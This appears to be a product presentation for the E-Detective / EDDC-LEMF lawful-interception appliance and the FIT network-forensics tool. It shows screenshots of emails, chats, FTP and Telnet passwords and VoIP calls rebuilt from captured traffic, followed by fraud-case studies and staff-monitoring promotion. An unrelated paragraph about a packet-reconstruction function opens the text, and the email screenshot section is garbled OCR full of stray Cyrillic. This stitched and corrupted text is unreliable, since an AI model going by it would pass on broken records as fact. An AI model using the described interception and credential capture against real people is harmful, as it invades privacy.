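Running `reconstruct(SAMPLE_PCAP)` yields three records (the SMTP envelope with sender, receivers and subject; the complete GET with its Host; the headerless port-80 session marked "Lost HTTP Header" with its raw fragment) plus a one-frame PCAP holding the port-5050 traffic. Sorting by sequence number is what makes the split "fran"/"kie@example.test" recipient reassemble correctly even though the second segment was captured first; a production tool additionally has to drop overlapping retransmissions and handle sequence-number wrap.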


Introduction to EDDC-LEMF (2) 


* Input data is either:
  - an XML description file plus PCAP files, or
  - a data stream (its parameters must be specified in advance).

* All output data is saved and processed by case ID.

* FTP server and client services are launched.

* Case management interface.

* Law enforcement management utility for cyber investigation (LEMF; in ETSI lawful-interception terminology the LEMF is the Law Enforcement Monitoring Facility that receives the intercepted data).


Implementation of EDDC-LEMF 


[Diagram:
1. Telecom / international gateway station or ... (optic fiber tap) sends PCAP data to the Mediation Platform. Connection: FTP; directory tree; file name convention; XML description file; PCAP files upload.
2. ED/LEMF System: FTP with the Mediation Platform; case ID management; web-based law enforcement management utilities and system administration.
3. Optional: Data Retention Management System with multiple ED/LEMFs, and an Analysis Server (data mining). Connection: FTP.]


EDDC Dashboard/Homepage 


[Screenshot: EDDC home page, logged in as admin (Admin). Menu: Case Results | Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout. Case Name: default; Raw Data Import Filter: N/A; Import Record; Build Backup ISO. Panels: Total Throughput Statistical Report (2009-06-18 18:34:31), Top-Down View Report, Online User List. Summary row: Daily Traffic (2009-06-18) 222 records / 93,341 KB; Weekly Traffic (2009-06-11 ~ 2009-06-18) 250 / 93,700 KB; Total Traffic 13,951 / 390,555 KB; per-service rows below it (EMAIL: POP3 0 / 0 KB daily and weekly, 66 / 16,043 KB total; IMAP; SMTP; Webmail (Read); FILE TRANSFER 12 / 48,701 KB; ...). Top-down view by account, each with Who is?, Protocol, Daily, Weekly and Summary links: 192.168.1.142 115,532 KB; 192.168.1.33 102,766 KB; 192.168.1.10 96,256 KB; 192.168.1.11 32,401 KB; 192.168.1.9 31,845 KB; ...; 192.168.1.179 9,905 KB; 192.168.1.132 951 KB; 192.168.10.10 359 KB; 192.168.1.13 284 KB; 66.94.230.122 210 KB; 68.142.233.22 46 KB; 192.168.6.8, 2423.70.11 (separator lost in extraction), 60.250.163.131, 220.141.42.6 and 192.168.6.23 0 KB.]


Sample Reconstruction: Email 


Case Results Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Маше: default ~ Raw Data Import Filter : N/A v Import Record | Build Backup ISO | 
A 
REPORT [E-MAIL [CHAT FILE TRANSFER GAME HTTP TELNET VOIP SSL FUNCTION | OK 
[f2 РОРЗ - | Every Page| 10) 
№. 9 Date-Time Account Sender Receiver сс Subject Login Password 
26. Q “.. 192.168.1.11 frankie.decision()gma. JB m UN finds world economic inse... ѕиррой@ес — eddecision: 
25 20080792 192468111 wedetective2@hotmail ‚ЕЕ " Africa support@e — eddecision; 
24. 0 EE 192 168.1.11 fransyinmy(Qyahoo.com LIMEN support@ed Bragil's new drunken dri... supporte. — eddecision: 
2008-07-02 B ; генде 
23. 10:28:43 192.168.1.11 support@ed-system.sg Support Q  r«o:7192 168112/9ne Sl Cmm Vshow msg php? PROG=mail mail msg php& IDX-ZA&T SQLI -Select - Windows Intemet Explorer Ee eddecision: 
2008-07-02 B E E "== = - E : РЕНИ 
22. 10:28:43 192.168.1.11 sharonneujsm.com list@neu 24 Brazil's new drunken driving law stirs discontent | eddecision: 
2008-07-02 в Subject Brazil's new drunken driving law stirs discontent п а. 
21 10-28-43 192.168.1.11 support(Jed-system.sg 5иррога) | жам те eddecision: 
20 20080702 _ 4s) 168111 gandong2004@mail hua. г Б невен ©  eddecision; 
10:28:43 g g Ча... enquiry - Rapports systems a 
19. и 192.168. (аа лала мес eR oe ЗЛЕ па = —— ] | eddecision: 
2008-07-02 ae ту || Sar 
ж 10:28:43 TEN. пратити БЕ eddecision: 
17 2008-07-02 192 168 BRASILIA - POLICE have arrested hundreds of Brazilian drivers und i ivi ision: 
Ф 6 қ - е arre: rs under a tough new law designed to crack down on rampant drunken driving, but bar — eddecision: 
10:28 43 rt owners are working to overturn the measure and many of their clients are flouting it. " 
мч 1 2 34 5 6 a » № Brazil has some of the world's most dangerous roads, with 7 deaths per 10,000 cars each year, compared to опе or two deaths in most European ‘urrent Page 5 


countries, according to the Brazilian Association of Traffic Medicine. 
An estimated 45 per cent of those 36,000 annual deaths are due to drinking. the group says. 


The law, which took effect on June 20, effectively bars drivers from drinking and imposes stiff fines. One beer is enough to exceed the new limit of 0.2 
decigrammes of alcohol per litre of blood. The old limit was 0.6 decigrammes. 


Violators face at least а 1755600 (55818) fine, a one-year suspension of driving privileges and temporary impoundment of their cars. 
Heavy drinkers can be imprisoned. 


In 10 days federal police, who monitors the country's main highways, have arrested some 300 motorists and fined many more even though experts say 
they are undertrained, underfunded and underequipped. Some states only have a handful of breathalysers. 


Done @ Internet | Protected Mode: Off fay 910% ~ 


@ Internet | Protected Mode: Off fg R10% ~ 


Sample Reconstruction: Email 


[Screenshot: Case Results; Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout. Case Name: default; Raw Data Import Filter: N/A; Import Record; Build Backup ISO; Every Page 10. Tabs: REPORT | E-MAIL | CHAT | FILE TRANSFER | GAME | HTTP | TELNET | VOIP | SSL | FUNCTION. Columns: No., Date-Time, Account, Sender, Receiver, CC, BCC, Subject, Login, Password. Records 1-9: dated 2008-09-22 09:03-09:15 (accounts flyy, vic, peter; senders flyy@decision.com.tw, vic@decision.com.tw, peter@decision.com.t...; receivers edetective@163.com, king0613@y..., vincentyao@decision...., flyy@decision.com.tw) and 2008-07-02 10:30-10:34 (account decision, sender decision@ed-system.s..., receivers decision@ed-system.s... and support@ed...); subjects include RE: 01northern lights, Fw: 06block from..., Fw: 04other information, Fw: 03serious condition, MY Email, New York (several subjects carry Chinese text that did not survive extraction); Login/Password N/A; Total 19, page 2 of 2. A File Download dialog offers the captured attachment Customer Request Form.doc (Document, 513...) from 192.168.1.12 (record 2008-07-02 18:33:24), and the opened message body is a news article, "New York City restaurants go trans-fat-free". Status bar: Done, Internet | Protected Mode: Off.]


Sample Reconstruction: Webmail (Read)

[Screenshot: Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout. Case Name: default; Raw Data Import Filter: N/A; Import Record; Build Backup ISO. Tabs: REPORT | E-MAIL | CHAT | FILE TRANSFER | GAME | HTTP | TELNET | VOIP | SSL | FUNCTION. Webmail Token Analyzer, Every Page 10. Columns: No., Date-Time, Account, Sender, Receiver, CC, Subject, Webmail Type. Records 9-21 dated 2008-07-02 10:21-10:26 from 192.168.1.11: GMail (wedetective2@hotmail... to frankie.deci...), Windows Live (pics for you to smile; Human genome changes with age; FW: Auditing Tool), YAHOO2.0 Mail (registration@youtube... to fransyinmy@y..., Clip Extractor; support@ed-system.sg to fransyinmy@y..., ...increase flights; ...ying party); Total 88, page 8 of 9. Opened record: FROM registration@youtubeclipextractor.com; DATE/TIME 2008-07-02 10:21:12; TO fransyinmy@yahoo.com; SUBJECT "Your YouTube Clip Extractor registration"; body: "Hi frank, ... be sent directly to the page confirming your registration and your software will be activated. To activate YouTube Clip Extractor, please click here now. Enjoy :-). The YouTube Clip Extractor team, http://www.YouTubeClipExtractor.com". Status bar: Internet | Protected Mode: Off.]


Sample Reconstruction: Webmail (Sent)

[Screenshot: Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout. Case Name: default; Raw Data Import Filter: N/A; Import Record; Build Backup ISO. Tabs: REPORT | E-MAIL | CHAT | FILE TRANSFER | GAME | HTTP | TELNET | VOIP | SSL | FUNCTION. Webmail Sent, Every Page 10. Columns: No., Date-Time, Account, Sender, Password, Receiver, CC, BCC, Subject, Webmail Type. Records: 88 (2008-09-22 09:54:24, 192.168.1.10, diesis...@ms62.hinet..., to vic.decision..., Fw: FW: ..., HiNet Mail); then 2008-07-02 10:22-10:28 from 192.168.1.11: frankie.decision@gma... to decision@ed-..., "Bush" (GMail); 84, to support@ed-s..., "UN finds world economic insecurity ..." (GMail); wedetective2@hotmail... to support@ed-s..., "Africa" (Windows Live); 19, to frankie.deci..., "...agency hails green energy 'gold ..." (Windows Live); fransyinmy@yahoo.com, "... at Irish mi..." (YAHOO2.0 Mail); page 2 of 2. Opened record 84: FROM frankie.decision@gmail.com; DATE/TIME 2008-07-02 10:27:24; subject "UN finds world economic insecurity among rich, poor"; ATTACHMENT SIA.jpg, offered by a File Download dialog as JPEG Image, 23.2 KB from 192.168.1.12; the body is a news article on the UN annual survey of world economic and social trends. Status bar: Done, Internet | Protected Mode: Off.]


Sample Reconstruction: IM - MSN 


[Screenshot: CHAT tab of the Case Results view, MSN sessions. Columns: No., Date-Time, Account (client IP), User Handle, Participants, Conversation, Count. Opening a conversation lists each message with Date-Time, User Handle and Message text (a short greeting exchange in the demo), followed by the files exchanged in that session with Date-Time, User Handle, File Name and File Size; the list is paged (Total 9, 2 pages).]


Sample Reconstruction: IM - YAHOO 


[Screenshot: CHAT tab, Yahoo Messenger sessions. Columns: No., Date-Time, Account (client IP or server IP), User Handle, Participants, Conversation, Count. The conversation pop-up has columns No., Date-Time, User Handle, Type (Message or File), Message, Time Started and Finish Time; in the demo a PDF form sent through the chat is listed as a File entry next to the text messages (Total 15, 1 page).]


Sample Reconstruction: File Transfer (FTP)


[Screenshot: FILE TRANSFER tab, FTP view. Columns: Date-Time, Account (client IP), Username, Password, Action (Download), FTP Server IP, File Name. Usernames and passwords, including anonymous logins with their e-mail-style passwords, appear in clear text because FTP transmits them unencrypted. Clicking a file name fetches the reconstructed file from the appliance's download.php endpoint; the demo opens a recovered D-Link DWA-642 datasheet PDF in Internet Explorer and shows the File Download dialog (Adobe PDF, 594KB).]


Sample: File Transfer (P2P File Sharing)


[Screenshot: FILE TRANSFER tab, P2P view. Columns: No, Date-Time, Account (client IP), Tool (Foxy 1.9.8.0, BitTorrent), File Name, Last Activated, Send Throughput, Receive Throughput, Detail. The Detail pop-up for one download lists every peer connection with No, Date-Time, Action (Download), P-IP (peer IP), Port, P-Port (peer port) and bytes transferred (24 entries over 3 pages in the demo).]


Sample: HTTP (Web Reconstruct)


[Screenshot: HTTP tab, Web Reconstruct view. Columns: No., Date-Time, Account (client IP), Content (the requested URL); 549 records over 55 pages in the demo. Selecting a record re-renders the captured page in a pop-up; the demo shows a Yahoo! News Singapore article rebuilt from the captured HTTP responses, including its iframes and advertisements.]


Sample: HTTP (Download/Upload)


[Screenshot: HTTP tab, Download/Upload view. Columns: No., Date-Time, Account (client IP), Action (Download or Upload), File Name, File Type, URL, Size; 320 records over 40 pages in the demo. The entries include ZIP downloads from an ICQ content server and JPEG uploads posted to a webmail attachment handler (UploadAttachment.do); each file can be retrieved through the File Download dialog.]


Sample: HTTP (FLV Video Streaming)


[Screenshot: HTTP tab, Video Stream view. Columns: No., Date-Time, Account (client IP), HOST, File Name, URL, Size; 37 records over 5 pages in the demo. Flash video (.flv) objects fetched from YouTube and Metacafe cache servers are listed next to the corresponding watch-page URLs. The player pop-up is served by the appliance over HTTPS and Internet Explorer flags a Certificate Error for the appliance's self-signed certificate.]


Sample: Telnet (with play back)


[Screenshot: TELNET tab. Columns: No., Date-Time, Account (client IP), Server, User, Password, Record File, Size; 13 records over 2 pages in the demo. Because Telnet is unencrypted, login names and passwords are recovered in clear (some rows show only control-character sequences where the keystrokes were not printable). Each session is stored as a TELNET_<id>.dat record that can be replayed.]


Sample: VoIP SIP/H.323 RTP Voice Calls


[Screenshot: VOIP tab. Columns: NO., Date-Time, Account (IP), Caller, Callee, Mode (peer to peer), Type (SIP), Codec (G.723), File Name (VOIP_<id>.wav), Time (call duration, 8 to 11 seconds in the demo); 2 pages of records. The RTP audio of each call is reconstructed into a WAV file named after caller and callee, offered through the File Download dialog as 'Wave Sound'.]


Sample: HTTPS/SSL Traffic


[Screenshot: SSL tab. Columns: No, Date-Time, Account, Client-IP, Server-IP, Port (443), File Name, Bytes; 11,185 encrypted sessions over 1,399 pages in the demo. Each record is named SSL_ENC_<client>_<port>_<start>_<end>, where the client IP is written as a decimal integer and the session start and end are Unix timestamps. Below the list is an 'Upload Key File' form with a Certificate File field and an Upload button.]


SSL Private Key is required to decrypt the SSL encrypted content.


User Management Features


[Screenshot: User Management page. The user table has columns Group, User, Authority (Admin, Analyst, Group Admin, User), Created and Function (Delete | Modify Password | Modify Authority | Modify Priority | Case Visibility). Case Visibility opens a Visible Case List granting Read, Write and Modify per case. The Create New User form has the required fields Authority, User Name, Password, Confirm Password and Priority (default: normal); note: * is the required field.]


Case Management Features


[Screenshot: Case Management page. The case table has columns Creation Date-Time, Case Name, Creator, Path (under /datas/rawdata_import/cases/) and Function (Delete | Clear | Modify | Modify Priority | Imported Record | Query Result); the demo shows the default case and two cases owned by a group. Imported Record opens the Raw Data Imported History and Raw Data Imported List with columns ID, Import Date-Time, User, Case Name, Tag Name, File, Delete, File Date-Time, File Source and Import File. The Create New Case form has the required fields Case Name, Case Path Name, Group and Priority (default: normal); Note: * is the required field.]


Importing PCAP for Analysis & Reconstruction


[Screenshot: Import Analysis page. File Source is chosen by Group and Case, which maps to a path such as /datas/rawdata_import/cases/default/default/. The file table has a selection checkbox and the columns File Name, File Date-Time, File Size and Function (Delete, Modify File Name); the demo lists sample .pcap captures ranging from 76KB to 87MB. Selected files are imported by giving a Tag Name and an optional File-Time From/To filter and starting the analysis; an Analyze Log button shows progress.]


Reconstructed Data Export/Backup


[Screenshot: Build Backup ISO dialog reached from the Case Results view. Reconstructed data is exported per CATEGORY via checkboxes: ALL, POP3, SMTP, IMAP, Webmail (Read), Webmail (Sent), MSN, ICQ, YAHOO, QQ, UT Chatroom, SKYPE, GOOGLETALK, IRC Chatroom, FTP, P2P, Online Game, HTTP Link, HTTP Content, HTTP Upload/Download, HTTP Reconstruct, Video Stream, Telnet, VoIP, SSL.]


System Setup


Network Setup/ System Backup/ Port Setting/ Update System Time/ System Reboot/PowerOff/ Upgrade/ Registration


[Screenshot: background job queue with columns Job ID, Date/Time, Priority, Subject, Owner and Function (Stop). The Job Status pane auto-refreshes and streams the export log for an 'Export in Case : default' job, each line timestamped and tagged INFO DECODING with the message 'eddc mkexport : Backup starting - 18 %'.]


Offline Packet Reconstruction Series


Introduction to Forensics Investigation Toolkit (FIT)


Offline Raw Data Files (PCAP) Decoding and Reconstruction Tool


Solution for:

    Internet & Network Traffic Content Analysis (Network Administrator)

    Auditing of Internet & Network Traffics (Network Administrator)

    Academic


A Windows based tool suitable for all groups of users to analyze and forensically investigate the content of captured Internet/network raw data files.


Compatible with Windows.


[Slide graphic: Internet Content Analysis and Reconstruction.]

Forensics Investigation Toolkit Application


[Diagram: Internet raw data captured on the LAN in PCAP format (e.g. eth0..123..pcap, eth0..456..pcap) by a LAN administrator or officer is loaded into the Forensics Investigation Toolkit (FIT) for offline decoding and reconstruction.]


Sample: Email (POP3, SMTP and 


[Screenshot: FIT's Network Forensics Analysis Toolkit window (menus: File, Edit, View, Case Management, Tool, Window, Help). The left tree groups reconstructed sessions by protocol with record counts: E-Mail (POP3, IMAP, WebMail(Send)) and CHAT (MSN, ICQ, YAHOO, QQ, SKYPE, UT Chatroom, GoogleTalk). The POP3 / SMTP grid has columns Datetime, Source IP, Source MAC, Destination IP, Sender, Receiver, CC, Subject, Body and Size. Selecting a message fills the Detail pane (sender, receiver, mail server's IP address, send date) with tabs Content, Whois and Source Code; Source Code shows the raw message headers (Return-Path, X-Original-To, Delivered-To, Received).]


Sample: Webmail - Yahoo Mail, Gmail, Hotmail etc.


[Screenshot: Network Forensics Analysis Toolkit, Webmail Received view. Same protocol tree on the left; the grid has columns Datetime, Source IP, Source MAC, Destination IP, Sender, Receiver, CC and Subject, with the demo showing Gmail messages captured from one client. The Detail pane gives Send Date and Receiver, and the Content and Source Code tabs show the rendered message (a LinkedIn welcome mail) and its HTML source.]


Sample: IM - Yahoo, MSN, ICQ, IRC, ...


[Screenshot: Network Forensics Analysis Toolkit, MSN view. The CHAT tree lists ICQ, YAHOO, QQ, SKYPE, UT Chatroom, GoogleTalk and IRC Chatroom with record counts, followed by a File Transfer branch. The grid has columns Captured Time, Source MAC, Source IP, Destination IP, Chat Session Owner, Participator and Chat Session; the Detail pane repeats these fields and the Chat Session tab shows the message timeline, including file transfer and video and voice call events within the session.]


Sample: File Transfer - FTP Upload/Download

[Screenshot: Network Forensics Analysis Toolkit, FTP view listing Captured Time, Source MAC, Source IP, Destination IP, Transferred File and size (6/15/2009 3:21 and 3:24 PM, 00:0e:a6:39:47:43, 192.168.1.33 to 192.168.1.249, DiagnosticCD ED2-1-10-2.iso, 18187812 and 15695696 bytes); Detail pane: Captured Time 2009/06/15 (Monday) 15:21, User's IP Address 192.168.1.33, FTP Server's IP Address 192.168.1.249, and the FTP Login Password field (FTP credentials travel in cleartext, so the tool reconstructs them directly from the capture)]
Sample: File Transfer - P2P File Sharing

[Screenshot: Network Forensics Analysis Toolkit, P2P view listing Captured Time, Source MAC, Source IP, Destination IP, Last Activated Time, P2P Tool and Transferred File (9/10/2009 and 10/30/2009, 00:0a:e4:00:c0:08, 192.168.1.190; tools Foxy 1.9.8.0 and BitTorrent; files such as a Foxy setup package and .mp3 tracks); a peer table lists Source Port, Destination IP, Destination Port and byte counts for several remote peers; Detail pane: Last Activated Time 2009/09/10 (Thursday) 11:26, P2P Tool Foxy 1.9.8.0]
Sample: HTTP (Content)

[Screenshot: Network Forensics Analysis Toolkit, HTTP Content view listing Captured Time, Source MAC, Source IP, Destination IP, Web Server's Host, Charset and Label of Web Page (6/15/2009 3:31 to 3:32 PM, 00:0A:E4:00:C0:08, 192.168.1.190; hosts tw.yahoo.com, ad.yieldmanager.com, ca.yahoo.com and ca.news.yahoo.com; UTF-8 pages labelled "Yahoo! Canada" and "Yahoo! Canada News"); Detail pane: Captured Time 2009/06/15 (Monday), User's IP Address 192.168.1.190, Web Server's IP Address 119.160.246.241, Web Server's Hostname tw.yahoo.com, URL http://tw.yahoo.com/, with Whois and Source Code tabs showing the reconstructed page HTML and scripts]

Sample: HTTP Upload/Download

[Screenshot: Network Forensics Analysis Toolkit, HTTP Upload/Download view listing Captured Time, Source MAC, Source IP, Destination IP, Web Server's Host and Transferred File (6/15/2009 3:37 to 4:32 PM; 192.168.1.33 and 192.168.1.190; hosts www.wowtaiwan.com.tw, www.mystercrowley.com, www.citadel5.com and www.feedbackchat.com; files Launcher.txt, Ejector_v1.0.zip and gscalc60.zip); Detail pane: User's IP Address 192.168.1.33, Web Server's IP Address 203.66.142.57, Web Server's Hostname www.wowtaiwan.com.tw, TYPE Download, Transferred File Launcher.txt, with a Whois button]
Sample: HTTP Video Streaming (FLV)

[Screenshot: Network Forensics Analysis Toolkit, Http Video view listing Captured Time, Source MAC, Source IP, Destination IP, Web Server's Host and Transferred File (11/2/2009 9:21 AM from 192.168.1.10 via pic.adver.com.tw; 6/15/2009 3:50 to 3:55 PM from 192.168.1.190 to 203.66.48.39, 203.66.48.40 and 203.66.48.45), each entry a reconstructed HTTPVIDEO .flv file; Detail pane with User's IP Address, Web Server's IP Address, Web Server's Hostname, TYPE and Transferred File, plus Hostname Query and Whois buttons]
Sample: HTTP Request

[Screenshot: Network Forensics Analysis Toolkit, Http Request [4310] view listing Captured Time, Source MAC, Source IP, Destination IP, Web Server's Host, Transferred File and Extension (6/15/2009; 192.168.1.33 to 203.66.142.57 www.wowtaiwan.com.tw; 192.168.1.190 to 72.14.203.104 relay.google.com, 119.160.246.241 tw.yahoo.com and 124.108.103.241 ad.yieldmanager.com); Detail pane: User's IP Address 192.168.1.33, Web Server's Hostname www.wowtaiwan.com.tw, with Whois and the reconstructed page source]
[Screenshot: Network Forensics Analysis Toolkit, E-Mail tree with POP3 [33], IMAP [6] and WebMail(Send) [47]; the POP3 list shows Datetime, Source IP, Source MAC, Destination IP, Sender, Receiver and Subject (9/10/2009 11:11 AM, 192.168.1.190 to 220.130.119.240); Detail pane with Content, Whois and Source Code tabs: Subject "Hi, This is a test mail", Sender decision_test@yam.com, Receiver decision123@pchome.com.tw, Datetime 2009/09/10 (Thursday) 11:11, Source MAC 00:0a:e4:00:c0:08, Source IP 192.168.1.190, Destination IP 220.130.119.240]
Free Text Search - Search by Key Words 



Cyber Crime Investigation and Some Case Studies


Globalized Crime Issue

The borderless Internet makes criminal behaviour more globalized. Through the Internet and cloud computing, communication within a swindler group can be enhanced and made anonymous. Because of the limits of state authority and this anonymity, it is very hard for state prosecutors and police to take

[Map: swindlers operating across Taiwan, Thailand, North America, South Korea, China/HK and Vietnam]

Cloud Computing = Network Computing
Through the Internet, computers can cooperate with each

Challenges faced

Hard to find: a foreign proxy or router used as a jump board

* With new technologies (like IP phones), it is hard to intercept their calls with existing equipment. We need professionals and suppliers to find the way out.

* Looking for cross-border cooperation, or for other related clues if there is no cooperation.

* VPNs and foreign proxies used as jump boards mean criminals may be hidden deeper in the Internet.

Challenges faced

* Large volume analysis: analyze the data and find the key information by text mining and data warehousing.

* Missing or partial data: we must find how it is happening and analyze.

* Dummy: find the source and links, and know the key point through technical assistance and help from
Gap between Physical and Cyber

[Diagram: Physical Crimes side: human -> apprehend, arrest; place -> warrant, confiscate; others. eCrime side: web or tool, network activities, account -> apprehend, marked useless. Caption: different sources dealt with by police: hard to get a clue (don't know how to do it), and no way]


Biggest Case: 450 Nabbed in Largest Taiwan-China Fraud Bust

[Screenshot of the Channel NewsAsia article "450 nabbed in largest Taiwan-China fraud bust" (2010)]

TAIPEI: About 450 people were arrested in Taiwan and China Wednesday in the largest joint anti-fraud operation launched by the two sides, the island's police said.

More than 2,700 Chinese policemen and nearly 550 from Taiwan took part in coordinated raids against scam rings on both sides of the Taiwan Strait, said the Criminal Investigation Bureau in Taipei.

Taiwan police arrested 121 suspects and confiscated more than 10 million Taiwan dollars (312,500 US) while 329 were rounded up by Chinese authorities, according to the bureau.

"This is the largest-ever joint operation to show our determination to fight crime," the bureau said in a statement. "Let this be a warning to criminal groups thinking they can get away by moving back and forth across the Taiwan Strait."

According to the bureau, the suspects were accused of involvement in a variety of fraud schemes, including telephone and on-line auction scams, in which people paid money for goods they never received.

In a different type of scam, they allegedly assumed fake identities such as prosecutors, judges or police officers, apparently to get people to reveal their bank account details.

Taiwan and China, which split in 1949 after a civil war, signed a joint crime-fighting and judicial assistance agreement last year amid improving ties.

http://www.channelnewsasia.com/stories/afp_asiapacific/view/1077084/1/.html
450 Nabbed in Largest Taiwan-China Fraud Bust

* The suspects were accused of involvement in a variety of fraud schemes, including telephone and on-line auction scams, in which people paid money for goods they never received.

* In a different type of scam, they allegedly assumed fake identities such as prosecutors, judges or police officers, apparently to get people to reveal their bank account details.

* E-Detective systems are deployed in multiple locations in China and Taiwan to help the operation track the suspects and preserve the evidence.

http://www.channelnewsasia.com/stories/afp_asiapacific/view/1077084/1/.html


Decision Group Solutions Implementation

[Diagram: Law Enforcement Agencies (MICT) with access to the Central Management System and Reporting, connected to Distributed Tap Systems and IDS]
Using E-Detective to Track Suspects

[Screenshot: VOIP list with columns No., Date-Time, Account, Caller, Callee, Mode, Type, Codec, File Name and Time; five peer-to-peer SIP calls from 192.168.6.8 and 192.168.1.132, codecs G723, iLBC and G729, each reconstructed to a VOIP_*.wav file lasting from 10 seconds to 1 minute 3 seconds; Total 5, Total Page 1, Current Page 1]

Play back of reconstructed VOIP file


E-Detective Other Reference Cases 


w.libertytimes.com.tw/2010/new/aug/12/today-centerl-2.htm 
E-Detective Other Reference Cases

[Screenshot of the Thanh Nien Daily article "Police arrest 99 from Taiwan, China for fraud", last updated Tuesday, August 24, 2010]

Ministry of Security police have arrested and charged 99 people from China and Taiwan in an international phone and Internet fraud scam that has fleeced

The arrestees, 76 from Taiwan and 23 from China, were placed in custody between June 29 and July 6, police said.

On July 7, Major General Nguyen Duc Minh said Vietnam would extradite the arrestees because they have not turned up any Vietnamese victims. The international crew targeted Chinese banks and citizens, mostly in Jiangsu, Anhui and Shanghai, he said.

Police seized telecommunications equipment, computers and telephones. Major General To Lam told VOV News that the criminals often took over entire hotels of up to 30 to 40 rooms for their operations.
E-Detective Other Reference Cases

* Company staff are caught sending valuable confidential information to rivals.

* The information sent out includes confidential price lists, tender information and a contact database.

* The information is sent through personal e-mail (Yahoo Mail, Gmail, etc.) and through IM (Yahoo Messenger, Windows Live Messenger, etc.).

* E-Detective is used to monitor staff online behaviour, retain and preserve all Internet communication, and protect the company's confidential information and intellectual property.
Sample IM - MSN Captured Content

[Screenshot: MSN conversation list with columns No., Date-Time, Account, User Handle, Participants, Conversation and Count (2010-07-20 and 2010-07-21, account frankie, handles frankiechan@hotmail.sg, newshih@hotmail.com and tom_0102@hotmail.com, participants netsis@hotmail.sg and natkit_perfect@hotmail.com); the opened conversation (2010-07-21 13:59:23, user handle frankiechan@hotmail.sg) lists each message with Date-Time, User Handle, Message, Type, File Name and File Size: a greeting exchange ("hello", "hi Frankie, Netsis here", "how are you?", "thanks Netsis", "bye"), a transferred MSN file of about 113 KB from 192.168.1.18, and the Windows file-download warning dialog; Total 11, Total Page 1, Current Page 1]